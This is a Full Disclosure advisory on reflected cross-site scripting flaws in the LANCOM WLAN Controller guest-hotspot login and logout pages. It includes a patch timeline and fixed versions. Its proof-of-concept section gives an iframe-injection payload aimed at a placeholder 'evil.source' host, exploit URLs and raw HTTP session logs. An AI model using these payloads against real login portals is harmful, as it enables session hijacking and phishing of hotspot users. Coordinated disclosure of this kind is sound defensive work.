[<prev] [next>] [day] [month] [year] [list]
Message-ID: <21469d19-603b-871f-9b74-ad150b301c0e@vulnerability-lab.com>
Date: Fri, 8 May 2020 15:38:34 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] LANCOM WLAN Controller - Multiple Cross Site Vulnerabilities
Document Title:
===============
LANCOM WLAN Controller - Multiple Cross Site Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2196
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/05/07/vulnerability-lancom-systems-wireless-controller-series-uncovered
Release Date:
=============
2020-05-07
Vulnerability Laboratory ID (VL-ID):
====================================
2196
Common Vulnerability Scoring System:
====================================
4.7
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Die LANCOM Public Spot Option ermöglicht die Bereitstellung eines
zuverlässigen und sicheren Zugangs für Gäste, Besucher,
Partner oder Kunden über nur eine Infrastruktur. Dabei bleiben Haus- und
Gastnetz stets sicher voneinander getrennt.
Ohne das Netzwerk um zusätzliche Hardware-Komponenten zu erweitern,
erhalten Sie mit der LANCOM Public Spot Option
die optimale Lösung für die Einrichtung sicherer Hotspots.
(Copy of the Homepage:
https://www.lancom-systems.de/produkte/software-optionen/lancom-public-spot/
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site scripting vulnerabilities in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
Affected Product(s):
====================
LANCOM Systems
Product: WLAN Controller WLC-1000 & WLC-4006 ...
Firmware: LCOS 10.12 SU14, 10.20 SU9 & 10.32 RU8
Vulnerability Disclosure Timeline:
==================================
2020-03-20: Researcher Notification & Coordination (Security Researcher)
2020-04-14: Vendor Notification (Security Department)
2020-04-15: Vendor Response/Feedback (Security Department)
2020-04-20: Vendor Fix/Patch (Service Developer Team)
2020-05-07: Security Acknowledgements (Security Department)
2020-05-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple cross site scripting web vulnerabilities has been discovered in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise
browser to web-application requests from the client-side.
The cross site scripting vulnerabilities are located in the `userid` and
`password` parameters of the `/authen/start/` (login/logout) module.
Unauthenticated attackers can connect to the guest wifi (ibd gast) with
the web ui logon mask to inject own malicious non-persistent script
codes for client-side manipulations into the login and password input
fields. The execution can as well be triggered with a simple logout GET
method request via refresh parameter. The request method to inject the
malicious script code is POST and the attack vector of the vulnerability
is non-persistent on client-side.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is POST/GET. The vulnerabilities are classic client-side
cross
site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, non-persistent phishing
attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.
Request Method(s):
[+] POST / GET
Vulnerable Module(s):
[+] /authen/start/
[+] /logout/
Function(s):
[+] refresh
Vulnerable Parameter(s):
[+] Userid
[+] Password
Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with guest
authentication and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser
2. Tamper the http session protocol
2. Start a Wifi Scan
2. Identify the public guest hotspot of lancom
3. Connect to it with guest permissions without credentials
4. Interact by openening the web ui on login.com were you can connect
with the correct wifi access credentials
5. Inject the payload in the userid and password input fields of the
wifi hotspot login form and submit via post method
6. The injected script code directly executes near to the input field
were the content is insecure transmitted
7. Successful reproduce of the cross site scripting web vulnerability!
PoC: Payload
test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
PoC: Exploitation
http://www.login.com/authen/start/?refreshhost=192.168.20.13737&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
http://logout/authen/start/?refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Vulnerable Source:
<div id="contentDiv">
<h2>Login</h2>
<form method="POST" name="myForm" action="http://logout:80/authen/login/">
<div><input type="hidden" name="refreshdir" value=""></div>
<div><input type="hidden" name="refreshhost" value="192.168.20.137"></div>
<div><input type="hidden" name="refreshssl" value="0"></div>
<input style="color:#000000" id="userid" name="userid" type="text"
size="24" maxlength="64" value="a"><iframe src="[evil.source]/"></iframe>"
onfocus="if(this.value && this.value == this.defaultValue) {
this.value=''; if(document.all) {this.createTextRange().select(); }
this.style.color='#000000'; }" onblur="if(this.value == '') {
this.value='a""><iframe src="[evil.source]/"></iframe>';
this.style.color='#000000'; }"/><br>
<input id="password" name="password" type="text" size="24"
maxlength="64" value="Your password" onfocus="if(this.value &&
this.value == this.defaultValue) { this.value=''; if(document.all)
{this.createTextRange().select(); }
document.getElementById('showPassword').checked ?
this.type='text' : this.type='password'; this.style.color='#000000'; }"
onblur="if(this.value == '') { this.value='Your password';
this.type='text'; this.style.color='#ccc'; }">
<div style="padding-bottom:0px;">
<input id="showPassword" name="showPassword" type="checkbox"
onchange="if(document.getElementById('password').value &&
document.getElementById('password').value
!= document.getElementById('password').defaultValue) { this.checked ?
document.getElementById('password').type='text' :
document.getElementById('password').type='password' }"><span
id="showPasswordText">Show password</span>
</div>
--- [PoC Session Logs] --- (Login)
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: max-age=3600, must-revalidate
Content-Type: image/svg+xml
Content-Length: 9362
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Content-Security-Policy: default-src 'self' 'unsafe-inline'; script-src
'self' 'unsafe-inline' 'unsafe-eval'; connect-src *
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none';
camera 'none'; magnetometer 'none'; gyroscope 'none'; speaker 'none';
vibrate 'none'; fullscreen 'self'; payment 'none'
Content-Encoding: gzip
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: LANCOM
--- [PoC Session Logs] (POST) --- (Logout)
http://logout/authen/login/
Host: logout
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: null
Connection: keep-alive
Upgrade-Insecure-Requests: 1
refreshdir=&userid=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>&password=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
-
POST: HTTP/1.1 200 OK
Connection: Close
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none'; camera 'none';
magnetometer
'none'; gyroscope 'none'; speaker 'none'; vibrate 'none'; fullscreen
'self'; payment 'none'
Content-Encoding: gzip
Reference(s):
http://logout/
http://logout/authen/
http://logout/authen/login/
http://www.login.com/
http://www.login.com/images/
http://www.login.com/authen/
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by following the steps ...
1. Parse the content of the username and password input field to prevent
the injection point
2. Restrict the input field by disallowing the usage of specific special
chars for the name and password variables
3. Secure the output location were the content is insecure sanitized
delivered as output result
Solution of Manufacturer:
https://www.lancom-systems.de/service-support/soforthilfe/allgemeine-sicherheitshinweise/
https://www.lancom-systems.com/service-support/instant-help/general-security-information/
The vulnerabilities are resolved in the following versions ... LCOS
10.12 SU15, 10.20 SU10 & 10.32 RU9.
We recommend all product customers to update the lcos as soon as
possible to prevent attacks by criminals.
Security Risk:
==============
The security risk of the non-persistent cross site scripting
vulnerability in the login form of the wifi hotspot application is
estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists